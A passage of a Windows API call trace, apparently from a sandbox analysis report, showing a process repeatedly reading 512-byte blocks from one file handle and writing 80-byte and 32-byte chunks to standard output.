(_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.702] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.702] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.703] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.703] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.705] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.705] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] GetFileType (hFile=0x50) returned 0x1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] GetFileType (hFile=0x50) returned 0x1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] GetFileType (hFile=0x50) returned 0x1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] GetFileType (hFile=0x50) returned 0x1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.706] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.706] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.708] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.708] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.709] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.709] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.710] GetFileType (hFile=0x50) returned 0x1 [0147.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.710] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.737] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.737] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.738] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.738] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 